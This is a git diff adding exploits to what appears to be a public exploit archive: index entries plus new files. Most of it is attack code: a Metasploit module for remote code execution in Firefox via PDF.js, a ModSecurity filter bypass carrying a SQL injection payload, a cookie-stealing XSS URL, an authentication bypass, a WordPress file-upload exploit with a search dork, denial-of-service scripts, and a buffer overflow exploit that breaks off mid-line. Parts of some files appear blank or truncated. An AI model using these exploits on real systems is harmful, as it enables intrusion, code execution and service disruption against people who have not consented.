diff --git a/files.csv b/files.csv
index 2839bd36b..ba2021ec3 100755
--- a/files.csv
+++ b/files.csv
@@ -34083,6 +34083,9 @@ id,file,description,date,author,platform,type,port
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
+37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
+37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0
+37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
37758,platforms/win32/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ (199 Bytes Null-Free)",2015-08-12,noviceflux,win32,shellcode,0
37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0
@@ -34258,6 +34261,13 @@ id,file,description,date,author,platform,type,port
37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
+37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer Cross Site Scripting_ HTML Injection_ and SQL Injection Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Include Vulnerability",2012-10-06,L0n3ly-H34rT,php,webapps,0
+37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
+37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25
+37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80
+37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
+37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
+37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
diff --git a/platforms/linux/remote/37949.txt b/platforms/linux/remote/37949.txt
new file mode 100755
index 000000000..b54c70f1a
--- /dev/null
+++ b/platforms/linux/remote/37949.txt
@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/56096/info
+
+ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.
+
+ModSecurity 2.6.8 is vulnerable; other versions may also be affected.
+
+Proof of concept:
+-----------------
+
+wut.php:
+--------
+
+
+
+
+POST request:
+-------------
+
+POST /wut.php HTTP/1.1
+Content-Type: multipart/form-data; boundary=A
+Content-Length: 161
+
+--A
+Content-Disposition: form-data; name="xxx"[\r][\r][\n]
+--A
+Content-Disposition: form-data; name="yyy"; filename="z"
+
+1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
+
+--A--
+
+
+Output:
+-------
+
+1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
+
+(any change in the header should produce a 403)d
diff --git a/platforms/multiple/remote/37958.rb b/platforms/multiple/remote/37958.rb
new file mode 100755
index 000000000..eaf89d1f8
--- /dev/null
+++ b/platforms/multiple/remote/37958.rb
@@ -0,0 +1,257 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+ include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Firefox PDF.js Privileged Javascript Injection',
+ 'Description' => %q{
+ This module gains remote code execution on Firefox 35-36 by abusing a
+ privilege escalation bug in resource:// URIs. PDF.js is used to exploit
+ the bug. This exploit requires the user to click anywhere on the page to
+ trigger the vulnerability.
+ },
+ 'Author' => [
+ 'Unknown', # PDF.js injection code was taken from a 0day
+ 'Marius Mlynski', # discovery and pwn2own exploit
+ 'joev' # copypasta monkey, CVE-2015-0802
+ ],
+ 'DisclosureDate' => "Mar 31 2015",
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-0816'], # pdf.js can load chrome://
+ ['CVE', '2015-0802'] # can access messageManager property in chrome window
+ ],
+ 'Targets' => [
+ [
+ 'Universal (Javascript XPCOM Shell)', {
+ 'Platform' => 'firefox',
+ 'Arch' => ARCH_FIREFOX
+ }
+ ],
+ [
+ 'Native Payload', {
+ 'Platform' => %w{ java linux osx solaris win },
+ 'Arch' => ARCH_ALL
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'BrowserRequirements' => {
+ :source => 'script',
+ :ua_name => HttpClients::FF,
+ :ua_ver => lambda { |ver| ver.to_i.between?(35, 36) }
+ }
+ ))
+
+ register_options([
+ OptString.new('CONTENT', [ false, "Content to display inside the HTML ." ])
+ ], self.class)
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status('Sending exploit...')
+ send_response_html(cli, html)
+ end
+
+ def html
+ "#{datastore['CONTENT'] || default_html}"+
+ ""
+ end
+
+ def default_html
+ "The page has moved. Click here to be redirected."
+ end
+
+ def js
+ key = Rex::Text.rand_text_alpha(5 + rand(12))
+ frame = Rex::Text.rand_text_alpha(5 + rand(12))
+ r = Rex::Text.rand_text_alpha(5 + rand(12))
+ opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+ <<-EOJS
+function xml2string(obj) {
+ return new XMLSerializer().serializeToString(obj);
+}
+
+function __proto(obj) {
+ return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+}
+
+function get(path, callback, timeout, template, value) {
+ callback = _(callback);
+ if (template && value) {
+ callback = callback.replace(template, value);
+ }
+ js_call1 = 'javascript:' + _(function() {
+ try {
+ done = false;
+ window.onclick = function() {
+ if (done) { return; } done = true;
+ q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
+ setTimeout(function(){
+ q.location='data:text/html,';
+
+ setTimeout(function(){
+ var opts = #{JSON.unparse(opts)};
+ var key = opts['#{key}'];
+ q.messageManager.loadFrameScript('data:,'+key, false);
+ setTimeout(function(){
+ q.close();
+ }, 100)
+ }, 100)
+ }, 100);
+ }
+ } catch (e) {
+ history.back();
+ }
+ undefined;
+ }, "%url%", path);
+ js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
+ sandboxContext(_(function() {
+ p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+ l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+ l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+ }));
+ setTimeout((function() {
+ sandboxContext(_(function() {
+ p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+ l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+ l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
+ }));
+ }), timeout);
+}
+
+function get_data(obj) {
+ data = null;
+ try {
+ data = obj.document.documentElement.innerHTML;
+ if (data.indexOf('dirListing') < 0) {
+ throw new Error();
+ }
+ } catch (e) {
+ if (this.document instanceof XMLDocument) {
+ data = xml2string(this.document);
+ } else {
+ try {
+ if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
+ data = this.document.body.firstChild.textContent;
+ } else {
+ throw new Error();
+ }
+ } catch (e) {
+ try {
+ if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
+ return null;
+ } else {
+ throw new Error();
+ }
+ } catch (e) {
+ ;;
+ }
+ }
+ }
+ }
+ return data;
+}
+
+function _(s, template, value) {
+ s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
+ s = s.substring(0, s.length - 1);
+ if (template && value) {
+ s = s.replace(template, value);
+ }
+ s += __proto;
+ s += xml2string;
+ s += get_data;
+ s = s.replace(/\\s\\/\\/.*\\n/g, "");
+ s = s + ";undefined";
+ return s;
+}
+
+function get_sandbox_context() {
+ if (window.my_win_id == null) {
+ for (var i = 0; i < 20; i++) {
+ try {
+ if (window[i].location.toString().indexOf("view-source:") != -1) {
+ my_win_id = i;
+ break;
+ }
+ } catch (e) {}
+ }
+ };
+ if (window.my_win_id == null)
+ return;
+ clearInterval(sandbox_context_i);
+ object.data = 'view-source:' + blobURL;
+ window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
+ object.data = 'data:text/html,<'+'html/>';
+ window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '');
+}
+
+var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
+var i = document.createElement("iframe");
+i.id = "i";
+i.style=HIDDEN;
+i.src = "data:application/xml,";
+document.documentElement.appendChild(i);
+i.onload = function() {
+ if (this.contentDocument.styleSheets.length > 0) {
+ var i2 = document.createElement("iframe");
+ i2.id = "i2";
+ i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
+ i2.height = window.innerHeight+'px';
+ i2.width = window.innerWidth+'px';
+ i2.src = "data:application/pdf,";
+ document.documentElement.appendChild(i2);
+ pdfBlob = new Blob([''], {
+ type: 'application/pdf'
+ });
+ blobURL = URL.createObjectURL(pdfBlob);
+ object = document.createElement('object');
+ object.style=HIDDEN;
+ object.data = 'data:application/pdf,';
+ object.onload = (function() {
+ sandbox_context_i = setInterval(get_sandbox_context, 200);
+ object.onload = null;
+ object.data = 'view-source:' + location.href;
+ return;
+ });
+ document.documentElement.appendChild(object);
+ } else {
+ this.contentWindow.location.reload();
+ }
+}
+
+document.body.style.height = window.innerHeight+'px';
+
+var kill = setInterval(function() {
+ if (window.sandboxContext) {
+ var f = "chrome://browser/content/browser.xul";
+ get(f, function() {}, 0, "%URL%", f);
+ clearInterval(kill);
+ } else {
+ return;
+ }
+},20);
+
+EOJS
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/37933.txt b/platforms/php/webapps/37933.txt
new file mode 100755
index 000000000..a6a928def
--- /dev/null
+++ b/platforms/php/webapps/37933.txt
@@ -0,0 +1,38 @@
++-----------------------------------------------------------------+
++ Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) +
++-----------------------------------------------------------------+
+Affected Product: Netsweeper
+Vendor Homepage : www.netsweeper.com
+Version : 4.0.8 (and probably other versions)
+Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+Patched : Yes
+CVE : CVE-2014-9618
+
++---------------------+
++ Product Description +
++---------------------+
+Netsweeper is a software solution specialized in content filtering.
+
++----------------------+
++ Exploitation Details +
++----------------------+
+Netsweeper's 4.0.8 (and probably other versions) Client Filter Admin portal can be reached at http://netsweeper/webadmin/clientlogin/ and a username/password combination is required to Add a Profile, by setting the "action" parameter to "showdeny" it will force the admin interface to load and subsequently allow any non-authenticated user to create a new profile.
+
+URL Path: http://netsweeper/webadmin/clientlogin/?srid=&action=showdeny&url=
+
++----------+
++ Solution +
++----------+
+Upgrade to latest version.
+
++---------------------+
++ Disclosure Timeline +
++---------------------+
+24-Nov-2014: Initial Communication
+03-Dec-2014: Netsweeper responded
+03-Dec-2014: Shared full details to replicate the issue
+10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
+17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
+18-Dec-2014: Confirm fix
+17-Jan-2015: CVE assigned CVE-2014-9618
+11-Aug-2015: Public disclosure
diff --git a/platforms/php/webapps/37950.txt b/platforms/php/webapps/37950.txt
new file mode 100755
index 000000000..70dbd0938
--- /dev/null
+++ b/platforms/php/webapps/37950.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56102/info
+
+jCore is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may exploit these issues to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+jCore 1.0pre and prior versions are vulnerable.
+
+http://www.example.com/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27
\ No newline at end of file
diff --git a/platforms/php/webapps/37955.html b/platforms/php/webapps/37955.html
new file mode 100755
index 000000000..2dfccb71f
--- /dev/null
+++ b/platforms/php/webapps/37955.html
@@ -0,0 +1,57 @@
+
+
+
+
diff --git a/platforms/php/webapps/37956.txt b/platforms/php/webapps/37956.txt
new file mode 100755
index 000000000..164c49fb1
--- /dev/null
+++ b/platforms/php/webapps/37956.txt
@@ -0,0 +1,38 @@
+##################################################################################
+
+# Description : Wordpress Themes GeoPlaces3 - Arbitrary File Upload vulnerbility
+# Google Dork: inurl:/wp-content/themes/GeoPlaces3/
+# Date: 23 August 2015
+# Vendor Homepage: http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme
+# Tested on: Win 7 & Win 8.1
+# Author: Mdn_Newbie | Gantengers Crew
+# https://forum.gantengers-crew.org/
+
+##################################################################################
+
+Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php
+ wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php
+
+Path : /wp-content/uploads/tmp/
+
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+
+
+WE ARE : SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
+
+GREETS TO: Gantengers Crew - Indonesian Defacer - Indonesian Cyber Army - Defacer Tersakiti Team - Suram Crew - Surabaya BlackHat - AND All Moeslim Defacer
\ No newline at end of file
diff --git a/platforms/windows/dos/37954.py b/platforms/windows/dos/37954.py
new file mode 100755
index 000000000..0eb115c56
--- /dev/null
+++ b/platforms/windows/dos/37954.py
@@ -0,0 +1,92 @@
+#!/usr/bin/python
+# Exploit Title: Mock SMTP Server 1.0 Remote Crash PoC
+# Date: 23-08-2015
+# Exploit Author: Shankar Damodaran
+# Author's Twitter : @sh4nx0r
+# Vendor Homepage: http://mocksmtpserver.codeplex.com
+# Software Link: http://mocksmtpserver.codeplex.com/downloads/get/87077
+# Version: 1.0
+# Tested on: Microsoft Windows 7 Home Premium Service Pack 1
+# Tested on: Microsoft Windows XP Professional SP3
+# Image PoC : http://i.imgur.com/lp7NHTm.png
+
+
+# The Stack Trace from Microsoft Windows XP Professional SP3
+'''
+The Exception occured on EBX Register (E0434F4D)
+
+The Registers during the crash
+
+EAX 03BAF618
+ECX 00000000
+EDX 00000028
+EBX E0434F4D
+ESP 03BAF614
+EBP 03BAF668
+ESI 03BAF6A4
+EDI 001DFF28
+EIP 7C812FD3 KERNEL32.7C812FD3
+C 0 ES 0023 32bit 0(FFFFFFFF)
+P 0 CS 001B 32bit 0(FFFFFFFF)
+A 0 SS 0023 32bit 0(FFFFFFFF)
+Z 0 DS 0023 32bit 0(FFFFFFFF)
+S 0 FS 003B 32bit 7FFD6000(FFF)
+T 0 GS 0000 NULL
+D 0
+O 0 LastErr WSAECONNRESET (00002746)
+EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+ 3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
+
+Courtesy : Immunity Debugger
+
+'''
+
+
+
+import socket
+
+# Preparing a junk array with two NOPS.
+junk_bed=["\x90","\x90"]
+
+# The ip address of the remote host
+smtphost = '192.168.1.7'
+
+# The port of the remote host
+smtpport = 25
+
+for junk in junk_bed:
+
+ # Initialize the socket stream
+ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+ # Setting a 5 second tolerance limit to check the server uptime
+ s.settimeout(5)
+
+ # Connecting to the remote service.
+ s.connect((smtphost,smtpport))
+
+ # If the server doesn't respond, means its crashed.
+ try:
+ s.recv(1)
+ except socket.timeout:
+ print "The SMTP Server has been crashed."
+ quit()
+
+ # Sending the evil input
+ print "Evil Input Sent...Triggering a crash."
+ s.send('\r\n'+junk+'\r\n')
+
+ # Close the connection socket
+ s.close()
+
+# End of PoC - Shankar Damodaran
\ No newline at end of file
diff --git a/platforms/windows/dos/37957.txt b/platforms/windows/dos/37957.txt
new file mode 100755
index 000000000..e42af83f4
--- /dev/null
+++ b/platforms/windows/dos/37957.txt
@@ -0,0 +1,23 @@
+********************************************************************************************
+# Exploit Title: GOM Audio 2.0.8 Crash POC
+# Date: 8/24/2015
+# Exploit Author: Un_N0n
+# Software Vendor : http://audio.gomlab.com/
+# Software Link: http://audio.gomlab.com/download_log.gom
+# Version: 2.0.8 (2015/06/17)
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- open 'Goma.exe'.
+2- Goto Preference -> Manage -> Skins.
+3- Click on ADD, Browse CRASH.gas in it.
+~ Software will Crash.
+
+[Code to produce crash.txt]:
+junk = "A"*66666
+file = open("CRASH.gas",'w')
+file.write(junk)
+file.close()
+**********************************************************************************************
+
diff --git a/platforms/windows/remote/37951.py b/platforms/windows/remote/37951.py
new file mode 100755
index 000000000..944a215c4
--- /dev/null
+++ b/platforms/windows/remote/37951.py
@@ -0,0 +1,94 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Sharing Web Server v6.9 - USERID Remote Buffer Overflow
+# Version: 6.9
+# Date: 2015-08-22
+# Author: Tracy Turben (tracyturben@gmail.com)
+# Software Link: http://www.efssoft.com/
+# Tested on: Win7x32-EN,Win7x64-EN
+# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;)
+# Credits for vulnerability discovery:
+# superkojiman (http://www.exploit-db.com/exploits/33453/)
+
+
+from struct import pack
+import socket,sys
+import os
+
+host="192.168.1.15"
+port=80
+
+junk0 = "\x90" * 80
+
+
+# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
+# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
+# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
+call_edx=pack('